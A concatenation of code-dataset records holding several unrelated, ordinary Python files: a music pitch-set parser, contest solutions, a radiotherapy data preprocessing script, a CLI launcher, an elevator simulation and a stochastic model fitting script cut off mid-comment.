error.MultisetError\n elif rawForte[1] > TNIMAX[rawForte[0]]:\n raise error.MultisetError\n else: # successfil asignment\n scFound = forteToSc(rawForte[0], rawForte[1], inv)\n return scFound\n\n def _parsePsName(self, usrStr):\n \"\"\"convert a list of pitch names to a ps\n middle c == c4 == midi 60 == 0\n \"\"\"\n #usrStr = self._scrubUsrStr(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strScrub(elem)\n if elem == '': continue\n elif elem[0] not in list(pitchTools.REFdiaNameToPc.keys()):\n continue\n else: # this should never raise an error\n psList.append(pitchTools.psNameToPs(elem))\n return psList\n \n def _parseMidi(self, usrStr):\n \"\"\"conver midi values to psInt values\"\"\"\n usrStr = drawer.strStripAlpha(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n #usrList = usrStr.split(',')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(pitchTools.midiToPs(elem))\n return psList\n \n def _parseFq(self, usrStr):\n \"\"\"conver midi values to psInt values\"\"\"\n usrStr = drawer.strStripAlpha(usrStr)\n usrList = drawer.strToListFlat(usrStr, 'L')\n #usrList = usrStr.split(',')\n psList = []\n for elem in usrList: # may be int or float\n elem = 
drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(pitchTools.fqToPs(elem))\n return psList\n \n def _parsePsReal(self, usrStr):\n \"\"\"process a usr string entered as a list psReals\"\"\"\n usrList = drawer.strToListFlat(usrStr, 'L')\n psList = []\n for elem in usrList: # may be int or float\n elem = drawer.strToNum(elem.strip(), 'num')\n if elem == None: continue\n else: psList.append(elem)\n return psList\n\n def _parseSieve(self, usrStr):\n try:\n sieveObj = sieve.SievePitch(usrStr)\n psSet = sieveObj()\n except (SyntaxError, ValueError, TypeError, \n KeyError, error.PitchSyntaxError):\n raise error.MultisetError\n if psSet == []: # no values in this seive segment\n raise error.MultisetError\n return psSet\n \n def _parseTxt(self, usrStr, count=None):\n \"\"\"convert a text file commulative spectrum\"\"\"\n # usrstr is a file path\n try:\n specObj = spectral.SpectrumData(usrStr)\n psSet = specObj.getPitch('psReal', count)\n except (ValueError, IOError):\n raise error.MultisetError\n if psSet == []: # no values in this seive segment\n raise error.MultisetError\n return psSet\n \n def _getCount(self, termObj):\n \"\"\"get number of pitches to read interactively\"\"\"\n query = 'number of pitches?'\n while 1:\n usrStr = dialog.askStr(query, termObj)\n if usrStr == None: return None\n num = drawer.strToNum(usrStr, 'int')\n if num != None and num != 0: return num\n else:\n dialog.msgOut(('%senter a positive or negative integer.\\n' % \n lang.TAB), termObj) \n \n \n def _makeObj(self, ao=None, read=None):\n \"\"\" returns sc, pcset, trans from 0=C, and inv\n read arg allows non-interactive use: provide data as arg\n can be used to replace calls to getSet\n pass an ao to get references and termObj\n \"\"\"\n if ao != None:\n termObj = ao.termObj\n dlgVisMet = ao.external.getPref('athena', 'dlgVisualMethod')\n fpLastDir = ao.aoInfo['fpLastDir']\n else: # get defaults\n termObj = None\n dlgVisMet = 'txt'\n fpLastDir = ''\n \n attempts = 0\n usrStrType = None # not yet known what format user provided\n while 1:\n if read != None: # method must return result, not interactive\n if attempts > 0: return None # dont run more than once when reading\n usrStr = read # assign to usrStr for parsing\n else:\n usrStr = dialog.askStr(lang.msgSCgetSet, termObj)\n if usrStr == None: return None\n attempts = attempts + 1\n usrStrType = self._parseSetInputType(usrStr, termObj)\n # may get one or the other of these as input values\n scFound = None\n psSet = None\n try:\n if usrStrType == 'forte':\n scFound = self._parseForte(usrStr)\n elif usrStrType == 'psName':\n psSet = self._parsePsName(usrStr)\n elif usrStrType == 'psReal':\n psSet = self._parsePsReal(usrStr)\n elif usrStrType == 'sieve':\n psSet = self._parseSieve(usrStr)\n elif usrStrType == 'midi':\n psSet = self._parseMidi(usrStr)\n elif usrStrType == 'fq':\n psSet = self._parseFq(usrStr)\n elif usrStrType == 'txt':\n psSet = self._parseTxt(usrStr)\n # import will get a file dialog\n elif usrStrType == 'import':\n msg, ok = dialog.promptGetFile(lang.msgSCgetAudacity, \n fpLastDir, 'file', dlgVisMet, termObj)\n count = self._getCount(termObj) # count may be equal to None\n # call parse text after getting file path\n if ok: psSet = self._parseTxt(msg, count)\n else: return None # cancel\n else: return None\n except error.MultisetError:\n dialog.msgOut(lang.msgSCnoSuchSet, termObj)\n continue\n try:\n obj = Multiset(psSet, scFound)\n except error.MultisetError:\n return None # will be understood as error\n\n if read == 
None: # dont check response\n sc = obj.repr('sc')\n ps = obj.repr('psName')\n query = lang.TAB + 'SC %s as %s? ' % (sc, ps)\n ok = dialog.askYesNoCancel(query, 1, termObj) \n if ok != -1 and ok != 1: continue # return to top\n elif ok == -1: return None # destroy obj \n return obj\n\n def __call__(self, termObj=None, read=None):\n return self._makeObj(termObj, read)\n\n def getRange(self, setRange='all', tni=0):\n \"\"\"return a list w/ all sets returned as objects\n scObj os required for opperation\n \"\"\"\n objList = []\n for scTriple in self.scObj.getAllScTriples(setRange, tni):\n objList.append(Multiset(None, scTriple, self.scObj))\n return objList\n\n def getAllZ(self, setRange='all', tni=0, scObj=None):\n \"\"\"return a list of all Z set objects\n scObj required\"\"\"\n if scObj == None:\n scObj = SetClass()\n self.scObj = scObj\n\n objList = []\n for scTriple in self.scObj.findAllZ(setRange, tni):\n objList.append(Multiset(None, scTriple, self.scObj))\n return objList\n\n# def getAllSuperset(self, searchSetObj, setRange='all', tni=0, scObj=None):\n# \"\"\"return a list of all set objects that match search\n# scObj required\"\"\"\n# if scObj == None:\n# scObj = SetClass()\n# self.scObj = scObj\n# \n# searchResults, valueDict = searchSetObj.superSet(setRange, 0)\n# objList = [] # transform search results into objects\n# for scTriple in searchResults:\n# objList.append(Multiset(None, scTriple, self.scObj))\n# return objList, valueDict\n\n\n def getRef(self, searchStr, refType, setRange='all', tni=0):\n \"\"\"return a list of all set objects that match search\n \"\"\"\n\n objList = []\n resultList = findRef(searchStr, refType, setRange, tni)\n if resultList != None:\n for scTriple in resultList:\n objList.append(Multiset(None, scTriple))\n return objList # ordered list by incidence\n\n\n\n#-----------------------------------------------------------------||||||||||||--\n# no longer used\n# def getSet(termObj=None, read=None, scObj=None):\n# \"\"\"functional interface for object creation\"\"\"\n# # emulates old getSet method of SC\n# interObj = MultisetFactory()\n# obj = interObj(termObj, read, scObj)\n# if obj == None: # error\n# return None\n# else:\n# return obj.get('sc'), obj.get('psReal'), obj.tRef\n\n# no long used, and collides w/ baseTexture method\n# def getMultiset(termObj=None, read=None, scObj=None):\n# \"\"\"functional interface for object creation\"\"\"\n# # emulates old getSet method of SC\n# interObj = MultisetFactory()\n# return interObj(termObj, read, scObj) # may be None on error\n\n\n#-----------------------------------------------------------------||||||||||||--\n\ndef getPitch(termObj=None, read=None):\n while 1:\n if read != None:\n usrStr = read\n else:\n usrStr = dialog.askStr(\"enter a pitch or note name:\", termObj)\n if usrStr == None:\n return None\n usrStr = usrStr.lower() # make sure lower case\n try:\n obj = pitchTools.Pitch(usrStr)\n except error.PitchSyntaxError: \n if read != None: \n return None # failure\n dialog.msgOut('%sno such pitch exists.\\n' % lang.TAB, termObj)\n continue\n return obj\n\n#-----------------------------------------------------------------||||||||||||--\n\n\n\n# class TestOld:\n# def __init__(self):\n# self.testMultisetData()\n# \n# def testMultisetData(self):\n# demo = ((2,-5,3,5),(3.06,4.25,8.002),(34,),\n# (7,9,4,5,6,4,3,2,4,5,3,3,3))\n# for set in demo:\n# obj = Multiset(set)\n# print '\\n', obj, len(obj), obj.get('card')\n# for form in obj.forms:\n# print form, obj.repr(form)\n# print getattr(obj, form)\n# \n# def 
testMultisetTrans(self):\n# pass\n# \n# \n\n \n#-----------------------------------------------------------------||||||||||||--\nclass Test(unittest.TestCase):\n \n def runTest(self):\n pass\n \n def testDummy(self):\n self.assertEqual(True, True)\n\n\n#-----------------------------------------------------------------||||||||||||--\n\n\n\nif __name__ == '__main__':\n from athenaCL.test import baseTest\n baseTest.main(Test)\n\n\n","repo_name":"ales-tsurko/athenaCL","sub_path":"athenaCL/libATH/multiset.py","file_name":"multiset.py","file_ext":"py","file_size_in_byte":42806,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"72364093743","text":"import os.path\nimport sys\n\nINTO_FILE = False\noutput = []\n\n\ndef fast_input(file_name):\n global INTO_FILE\n if os.path.isfile(file_name):\n INTO_FILE = True\n with open(file_name, 'r') as file:\n input_lines = file.readlines()\n else:\n INTO_FILE = False\n input_lines = sys.stdin.readlines()\n\n for line in input_lines:\n yield line\n\n\nfast_input_reader = fast_input('input.txt')\n\n\ndef input():\n return fast_input_reader.__next__()\n\n\ndef print(line):\n output.append(str(line))\n\n\ndef solve():\n from collections import deque\n N, M = map(int, input().strip().split())\n graph = []\n for _ in range(N):\n graph.append(list(map(int, input().strip().split())))\n\n def get_neighbors(start_i, start_j):\n res = []\n for di, dj in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n i_, j_ = start_i, start_j\n while 0 <= i_+di < N and 0 <= j_+dj < M and graph[i_+di][j_+dj] != 1:\n i_ += di\n j_ += dj\n res.append((i_, j_, di, dj))\n return res\n\n distances = [[-1 for _ in range(M)] for _ in range(N)]\n queue = deque([(0, 0, 1, 0, 0)])\n\n while queue:\n i, j, di, dj, d = queue.popleft()\n temp_i, temp_j = i, j\n while 0 <= temp_i < N and 0 <= temp_j < M and graph[temp_i][temp_j] != 1:\n if graph[temp_i][temp_j] == 2:\n print(d)\n return\n temp_i -= di\n temp_j -= dj\n\n if distances[i][j] == -1:\n distances[i][j] = d\n for ngb_info in get_neighbors(i, j):\n queue.append((*ngb_info, d+1))\n\n\ndef main():\n solve()\n answer = '\\n'.join(output) + '\\n'\n\n if INTO_FILE:\n with open('output.txt', 'w') as output_file:\n output_file.write(answer)\n else:\n sys.stdout.write(answer)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zinchse/_contests","sub_path":"yandex training 3.0/olympiad_tier/bfs/toy_labyrinth.py","file_name":"toy_labyrinth.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74599453102","text":"\nimport sys\nsys.path.append(r'..\\..')\nimport argparse\nimport os\nimport portpy.photon as pp\nimport SimpleITK as sitk\nimport numpy as np\nimport torch\nfrom skimage.transform import resize\n\n\ndef get_dataset(in_dir, case, suffix):\n filename = os.path.join(in_dir, case + suffix)\n img = None\n if os.path.exists(filename):\n img = sitk.ReadImage(filename)\n img = sitk.GetArrayFromImage(img)\n\n return img\n\n\ndef get_ct_image(ct: pp.CT):\n ct_arr = ct.ct_dict['ct_hu_3d'][0]\n ct_image = sitk.GetImageFromArray(ct_arr)\n ct_image.SetOrigin(ct.ct_dict['origin_xyz_mm'])\n ct_image.SetSpacing(ct.ct_dict['resolution_xyz_mm'])\n ct_image.SetDirection(ct.ct_dict['direction'])\n\n return ct_image\n\n\ndef resample(img, ref_image):\n resampler = sitk.ResampleImageFilter()\n resampler.SetInterpolator(sitk.sitkLinear)\n resampler.SetReferenceImage(ref_image)\n img = resampler.Execute(img)\n\n return img\n\n\ndef write_image(img_arr, out_dir, case, suffix, ref_ct):\n img_itk = sitk.GetImageFromArray(img_arr)\n img_itk.SetOrigin(ref_ct.GetOrigin())\n img_itk.SetSpacing(ref_ct.GetSpacing())\n img_itk.SetDirection(ref_ct.GetDirection())\n filename = os.path.join(out_dir, case + suffix)\n sitk.WriteImage(img_itk, filename)\n\n\ndef get_crop_settings_calc_box(ct: pp.CT, meta_data):\n cal_box_xyz_start = meta_data['opt_voxels']['cal_box_xyz_start']\n cal_box_xyz_end = meta_data['opt_voxels']['cal_box_xyz_end']\n ct_img = get_ct_image(ct)\n start_xyz = ct_img.TransformPhysicalPointToIndex(cal_box_xyz_start) # X,Y,Z\n end_xyz = ct_img.TransformPhysicalPointToIndex(cal_box_xyz_end) # X,Y,Z\n start_zyx = [start_xyz[2], start_xyz[1], start_xyz[0]]\n end_zyx = [end_xyz[2], end_xyz[1], end_xyz[0]]\n return start_zyx, end_zyx\n\n \ndef get_crop_settings(oar):\n # Use to get crop settings\n # Don't use cord or eso as they spread through more slices\n # If total number of slices is less than 128 then don't crop at all\n # Use start and end index from presence of any anatomy or ptv\n # If that totals more than 128 slices then leave as is.\n # If that totals less than 128 slices then add slices before and after to make total slices to 128\n\n oar1 = oar.copy()\n oar1[np.where(oar == 1)] = 0\n oar1[np.where(oar == 2)] = 0\n\n # For 2D cropping just do center cropping 256x256\n center = [0, oar.shape[1] // 2, oar1.shape[2] // 2]\n start = [0, center[1] - 150, center[2] - 150]\n end = [0, center[1] + 150, center[2] + 150]\n\n depth = oar1.shape[0]\n if depth < 128:\n start[0] = 0\n end[0] = depth\n\n return start, end\n\n first_slice = -1\n last_slice = -1\n for i in range(depth):\n frame = oar1[i]\n if np.any(frame):\n first_slice = i\n break\n for i in range(depth - 1, -1, -1):\n frame = oar1[i]\n if np.any(frame):\n last_slice = i\n break\n\n expanse = last_slice - first_slice + 1\n if expanse >= 128:\n start[0] = first_slice\n end[0] = last_slice\n\n return start, end\n\n # print('Get\\'s here')\n slices_needed = 128 - expanse\n end_slices = slices_needed // 2\n beg_slices = slices_needed - end_slices\n\n room_available = depth - expanse\n end_room_available = depth - last_slice - 1\n beg_room_available = first_slice\n\n leftover_beg = beg_room_available - beg_slices\n if leftover_beg < 0:\n end_slices += np.abs(leftover_beg)\n first_slice = 0\n else:\n first_slice = first_slice - beg_slices\n\n leftover_end = end_room_available - end_slices\n if leftover_end < 0:\n first_slice -= np.abs(leftover_end)\n last_slice = depth - 1\n else:\n last_slice = last_slice + end_slices\n\n if 
first_slice < 0:\n first_slice = 0\n\n start[0] = first_slice\n end[0] = last_slice\n\n return start, end\n\n\ndef crop_resize_img(img, start, end, is_mask=False):\n # Crop to setting given by start/end coordinates list, assuming depth,height,width\n\n img_cropped = img[start[0]:end[0] + 1, start[1]:end[1], start[2]:end[2]]\n img_cropped = np.moveaxis(img_cropped, 0, -1) # Slices last\n\n order = 0\n if is_mask is False:\n order = 1\n img_resized = resize(img_cropped, (128, 128, 128), order=order, preserve_range=True, anti_aliasing=False).astype(\n np.float32)\n if is_mask is True:\n img_resized = img_resized.astype(np.uint8)\n\n img_resized = np.moveaxis(img_resized, -1, 0) # Slices first again\n\n return img_resized\n\n\ndef get_torch_tensor(npy_tensor, device):\n out = torch.from_numpy(npy_tensor)\n out.to(device)\n\n return out\n\n\ndef get_dvh(dose, oar, ptv):\n # Compute and return the dvh for all 6 OAR structures\n device = torch.device('cuda:0')\n dose = get_torch_tensor(dose, device)\n oar = get_torch_tensor(oar, device).long()\n oar = torch.nn.functional.one_hot(oar, 6)[..., 1:] # Remove BG\n oar = oar.permute(3, 0, 1, 2).to(torch.float)\n ptv = get_torch_tensor(ptv, device).long().unsqueeze(dim=0)\n ptv = ptv.to(torch.float)\n oar = torch.cat((oar, ptv), axis=0)\n\n vols = torch.sum(oar, axis=(1, 2, 3))\n n_bins = 351\n hist = torch.zeros((n_bins, 6)).to(device)\n bins = torch.linspace(0, 70, n_bins)\n bin_w = bins[1] - bins[0]\n\n for i in range(bins.shape[0]):\n diff = torch.sigmoid((dose - bins[i]) / bin_w)\n diff = torch.cat(6 * [diff.unsqueeze(axis=0)]) * oar\n num = torch.sum(diff, axis=(1, 2, 3))\n hist[i] = (num / vols)\n\n hist_numpy = hist.cpu().numpy()\n bins_np = bins.cpu().numpy()\n\n return hist_numpy, bins_np\n\n\ndef process_case(ct_portpy, meta_data, ct, dose, oar, ptv, beamlet, out_dir, case):\n oar_copy = oar.copy()\n oar_copy[np.where(ptv == 1)] = 6\n\n start, end = get_crop_settings_calc_box(ct_portpy, meta_data=meta_data)\n\n ct = crop_resize_img(ct, start, end, is_mask=False)\n oar = crop_resize_img(oar, start, end, is_mask=True)\n ptv = crop_resize_img(ptv, start, end, is_mask=True)\n dose = crop_resize_img(dose, start, end, is_mask=False)\n beamlet = crop_resize_img(beamlet, start, end, is_mask=False)\n beamlet[np.where(ptv == 1)] = 60 # PTV volume set to prescribed dose\n\n # Scale PTV volume (region) in dose to have average prescibed 60 Gy\n\n num_ptv = np.sum(ptv)\n dose_copy = dose.copy()\n dose_copy *= ptv\n sum = np.sum(dose_copy)\n scale_factor = (60 * num_ptv) / sum\n\n dose_copy *= scale_factor\n\n dose[np.where(ptv == 1)] = dose_copy[np.where(ptv == 1)]\n\n ct = np.clip(ct, a_min=-1000, a_max=3071)\n ct = (ct + 1000) / 4071\n ct = ct.astype(np.float32)\n\n dose = np.clip(dose, a_min=0, a_max=70)\n\n # hist, bins = get_dvh(dose, oar, ptv)\n\n filename = os.path.join(out_dir, case)\n np.savez(filename, CT=ct, DOSE=dose, OAR=oar, PTV=ptv, BEAM=beamlet)\n\n\n# Initialize parser\nparser = argparse.ArgumentParser()\n\n# Adding optional argument\nparser.add_argument(\"--in_dir\", required=False, help=\"Enter input dir having patient folders with their dicoms\")\nparser.add_argument(\"--out_dir\", required=False, help=\"Enter out dir having patient folders with their dicoms\")\nargs, _ = parser.parse_known_args()\nin_dir = args.in_dir\nout_dir = args.out_dir\n\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\ncases = os.listdir(in_dir)\n\nlabels = {\n 'cord': 1,\n 'esophagus': 2,\n 'heart': 3,\n 'lung_l': 4,\n 'lung_r': 5,\n 'ptv': 1\n} # PTV 
will be stored separately as its extent is not mutually exclusive with other anatomies\n\nfor idx, case in enumerate(cases):\n # process all the nrrd files\n try:\n\n if case == 'Lung_Phantom_Patient_1' or case == 'Lung_Patient_8':\n # These patient doesnt include some structures. Modify code in future\n continue\n print('Processing case {}: {} of {} ...'.format(case, idx + 1, len(cases)))\n # read dicom CT and write it in out_dir\n data = pp.DataExplorer(data_dir=in_dir)\n data.patient_id = case\n meta_data = data.load_metadata()\n # Load ct and structure set for the above patient using CT and Structures class\n ct = pp.CT(data)\n ct_arr = ct.ct_dict['ct_hu_3d'][0]\n structs = pp.Structures(data)\n beams = pp.Beams(data)\n inf_matrix = pp.InfluenceMatrix(ct=ct, structs=structs, beams=beams)\n beams_1d = inf_matrix.A * np.ones((inf_matrix.A.shape[1]))\n beams_3d = inf_matrix.dose_1d_to_3d(dose_1d=beams_1d)\n beams_3d = beams_3d.astype('float16')\n\n # normalize beams_3d. Don't forget add these lines\n beams_3d = ((beams_3d - np.amin(beams_3d)) / (np.amax(beams_3d) - np.amin(beams_3d))) * 72\n planner_dose_3d = pp.convert_dose_rt_dicom_to_portpy(ct=ct,\n dose_file_name=os.path.join(in_dir, case, 'rt_dose.dcm'))\n\n # oars = ['Cord', 'Esophagus', 'Heart', 'Lung_L', 'Lung_R', 'PTV']\n oars = ['cord', 'esophagus', 'heart', 'lung_l', 'lung_r', 'ptv']\n target_oars = dict.fromkeys(oars, -1) # Will store index of target OAR contours from dicom dataset\n\n oar_mask = np.zeros(ct_arr.shape, np.uint8)\n ptv_mask = np.zeros_like(oar_mask)\n\n for k, v in target_oars.items():\n # anatomy_mask = np.zeros_like(oar_mask)\n ind = structs.structures_dict['name'].index(k.upper())\n anatomy_mask = structs.structures_dict['structure_mask_3d'][ind]\n\n if k == 'ptv':\n ptv_mask[np.where(anatomy_mask > 0)] = labels[k]\n else:\n oar_mask[np.where(anatomy_mask > 0)] = labels[k]\n\n # print('Processing case {}: {} of {} ...'.format(case, idx+1, len(cases)))\n process_case(ct_portpy=ct, meta_data=meta_data, ct=ct_arr, dose=planner_dose_3d, oar=oar_mask, ptv=ptv_mask, beamlet=beams_3d, out_dir=out_dir,\n case=case)\n except:\n print('Processing of case {} failed'.format(case))\n pass\n","repo_name":"PortPy-Project/PortPy","sub_path":"portpy/ai/preprocess/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":9973,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"91"}
+{"seq_id":"17125430153","text":"import sys\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef solve():\n A1, A2, A3, A4 = map(int, rl().split())\n if A1 < A2 and A3 > A4:\n print('YES')\n else:\n print('NO')\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/yukicoder","sub_path":"yukicoder_contest/256/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20369529803","text":"from hatch_fancy_pypi_readme._builder import build_text\nfrom hatch_fancy_pypi_readme._fragments import TextFragment\n\n\nclass TestBuildText:\n def test_single_text_fragment(self):\n \"\"\"\n A single text fragment becomes the readme.\n \"\"\"\n assert \"This is the README!\" == build_text(\n [TextFragment(\"This is the README!\")], []\n )\n\n def test_multiple_text_fragment(self):\n \"\"\"\n A multiple text fragment are concatenated without adding any\n characters.\n \"\"\"\n assert \"# Level 1\\n\\nThis is the README!\" == build_text(\n [\n TextFragment(\"# Level 1\\n\\n\"),\n TextFragment(\"This is the README!\"),\n ],\n [],\n )\n","repo_name":"hynek/hatch-fancy-pypi-readme","sub_path":"tests/test_builder.py","file_name":"test_builder.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"91"}
+{"seq_id":"71140401263","text":"#!/usr/bin/env python3\n\"\"\"command interface for namuhub\"\"\"\nimport argparse\nimport os\n\nfrom waitress import serve\n\nfrom namuhub import app\n\n__all__ = ['main']\n\ndef runserver(args):\n if args.debug:\n app.run(host=args.host, port=args.port, debug=args.debug,\n threaded=True)\n else:\n serve(app, host=args.host, port=args.port)\n\ndef collectstatic(args):\n try:\n from react import jsx\n except ImportError:\n print('Please install PyReact package:')\n print(' >>> pip install PyReact')\n exit(1)\n transformer = jsx.JSXTransformer()\n for fn in next(os.walk('namuhub/static/jsx'))[2]:\n transformer.transform('namuhub/static/jsx/{}'.format(fn),\n js_path='namuhub/static/js/{}'.format(fn))\n exit(0)\n\ndef main():\n parser = argparse.ArgumentParser(prog='namuhub')\n subparsers = parser.add_subparsers(dest='command')\n\n server_parser = subparsers.add_parser('server')\n server_parser.set_defaults(function=runserver)\n server_parser.add_argument('-H', '--host',\n default='0.0.0.0',\n help=\"host to listen. [default: %(default)s]\")\n server_parser.add_argument('-p', '--port',\n type=int,\n default=24682,\n help=\"port to listen. [default: %(default)s]\")\n server_parser.add_argument('-d', '--debug',\n default=False,\n action='store_true',\n help=\"enable debug mode. [default: %(default)s]\")\n\n assets_parser = subparsers.add_parser('collectstatic')\n assets_parser.set_defaults(function=collectstatic)\n\n args, _ = parser.parse_known_args()\n if not args.command:\n parser.print_help()\n exit(1)\n args.function(args)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ssut/namuhub","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"6179736763","text":"#!/usr/local/bin/python\n# -*- coding: latin-1 -*-\n# Kyle Falconer\n# Mesosphere Programming Challenge\n# <2013-10-07 13:24 CDT>\n\nimport optparse, sys\n\nclass elevator:\n \n def __init__(self, id):\n \"\"\"\n Instantiates a new elevator, with current floor = 1 and\n no goal floors.\n \"\"\"\n self.id = id\n self.current_floor = 1\n self.goal_floors = list()\n \n def state(self):\n \"\"\"\n Reports on the current state of this elevator.\n \"\"\"\n return [self.id, self.current_floor, self.goal_floors]\n \n def get_next_floor(self):\n temp_floor = self.current_floor\n \n \n if len(self.goal_floors) > 0:\n if isinstance(self.goal_floors[0], tuple):\n direction = self.goal_floors[0][1]\n print(\"direction: \"+str(direction))\n if direction < 0 :\n # going down\n temp_floor = temp_floor - 1\n else :\n #going up\n temp_floor = temp_floor + 1\n else:\n print(\"not a tuple!\",self.goal_floors[0])\n \n return temp_floor\n \n def update(self, cur_floor, goal_floor):\n \"\"\"\n Updates the current floor and removes from the goal floors\n any floor numbers which are equal to the current floor.\n This is analogous to having the riders of an elevator leave\n the elevator when it has reached their floor.\n \"\"\" \n self.cur_floor = cur_floor\n \n for floor in self.goal_floors:\n if self.cur_floor == floor[0]:\n self.goal_floors.remove(floor)\n \n self.goal_floors.append(goal_floor)\n\n \n \nclass elevatorControlSystem:\n \n def __init__(self, num_elevators):\n self.elevators = list()\n self.pickup_requests = list()\n for i in range(0, num_elevators):\n self.elevators.append(elevator(i))\n \n def status(self):\n \"\"\"\n Returns a list of triples, each triple containing the current \n status of an elevator. The number of triples (\"elevators\") returned \n is equal to the number of elevators in the elevator control system.\n [(Elevator ID, Floor Number, Goal Floor Number)]\n \"\"\"\n return [(e.id, e.current_floor, e.goal_floors) for e in self.elevators ]\n \n def update(self, id, cur_floor, goal_floor):\n self.elevators[id].update(cur_floor, goal_floor)\n \n def pickup(self, pickupFloor, direction):\n # pickupFloor: which floor the request comes from\n # direction: (negative for down, positive for up)\n self.pickup_requests.append((pickupFloor, direction))\n \n def step(self):\n for i in range(0, len(self.elevators)):\n \n if len(self.pickup_requests) > 0:\n pickup = self.pickup_requests.pop()\n print(\"sending pickup request \"+str(pickup)+\" to elevator \"+str(i))\n self.update(i, self.elevators[i].get_next_floor(), pickup)\n elif len(self.elevators[i].goal_floors) == 0:\n print(\"no pickup request and no goal floors for elevator \"+str(i))\n continue\n else:\n print(\"no pickup request; sending elevator \"+str(i)+\" to next goal floor\")\n self.update(i, self.elevators[i].get_next_floor(), self.elevators[i].current_floor)\n\n \n \ndef main():\n args = sys.argv[1:]\n print('number of elevators: '+ args[0])\n ecs = elevatorControlSystem(int(args[0]))\n \n while True:\n line = ''\n try:\n line = input('ecs> ')\n except EOFError:\n break\n \n if line == 'quit':\n break\n elif line == \"status\":\n print(ecs.status())\n elif line == \"step\":\n ecs.step()\n print('')\n elif line.startswith('pickup'):\n ecs.pickup(int(line.split(' ')[1]), int(line.split(' ')[2]))\n print('')\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"Kyle-Falconer/mesosphere-challenge","sub_path":"elevators.py","file_name":"elevators.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"2503380931","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\nimport time\nfrom scipy import optimize\n# from numba import jit\nimport pandas as pd\n\nDim = 6 # Dimensionality of the system\nnDrift = 28 # terms for each Dimension of the drift\nnDiff = 1 #+Dim # terms for the Diffusion coefficient\n\n\n\n# let's only regard up to second order \ndef poly(x,sigma):\n x_vec=np.array([1,x[0],x[1],x[2],x[3],x[4],x[5], #7\n x[0]**2., x[0]*x[1], x[0]*x[2], x[0]*x[3], x[0]*x[4], x[0]*x[5],# 6 terms\n x[1]**2.,x[1]*x[2], x[1]*x[3], x[1]*x[4], x[1]*x[5], # 5 terms\n x[2]**2., x[2]*x[3], x[2]*x[4], x[2]*x[5], # 4 terms\n x[3]**2., x[3]*x[4], x[3]*x[5], x[4]**2., x[4]*x[5], x[5]**2]) # 6 terms\n return np.dot(sigma,x_vec) # Total: 28 terms\n\n#@jit\ndef D1(sigma,x):\n sigma = sigma[nDiff:] # without noise parameters\n sigma=sigma.reshape((Dim,-1))\n function=np.zeros((len(x),Dim))\n for i in range(Dim):\n function[:,i]=poly(x.T,sigma[i])\n return function\n\ndef DiffTerm(alpha,x):\n #x_vec = np.array([np.ones(x.shape[0])**2,x[:,0]**2, x[:,1]**2, \n # x[:,2]**2, x[:,3]**2, x[:,4]**2, x[:,5]**2])\n #return(np.dot(alpha[0:nDiff], x_vec))\n return(alpha[0])\n\n#@jit\ndef D2(alpha,x):\n return np.outer(np.eye(Dim,Dim),DiffTerm(alpha,x)).reshape((Dim,Dim,-1)) # Noise = alpha[0:nDiff]\n\n\ndef det_D2(alpha,x):\n return (DiffTerm(alpha,x)*np.ones(x.shape[0]))**Dim\n\n\ndef inv_D2(alpha,x):\n return np.outer(np.eye(Dim,Dim),\n 1/(DiffTerm(alpha,x)*np.ones(x.shape[0]) )).reshape((Dim,Dim,-1))\n\n\n# Log Likelihood and negative logL\n\ndef log_likelihood(alpha,x,dt):\n # alpha is the current set of parameters\n # x is the entire data set N x 2\n # dt is the time difference\n \n log_like = 0 # initial value of sum\n \n #calculate D1 and D2 or each position in the data x\n \n if min(alpha[0:nDiff])>0: # noise must be positive!\n \n dx = x[1:,:]-x[:-1,:] \n \n d1 = dx -D1(alpha,x)[:-1,:]*dt\n d2 = D2(alpha,x)\n d2_inv = inv_D2(alpha,x)\n d2_det = det_D2(alpha,x)[:-1]\n \n\n r = np.array([np.dot(d1[i,:],\n np.dot(d2_inv[:,:,i].T,\n d1[i,:])) for i in range(len(x)-1)])\n\n # HERE: Instead of summing all components (i.e. 
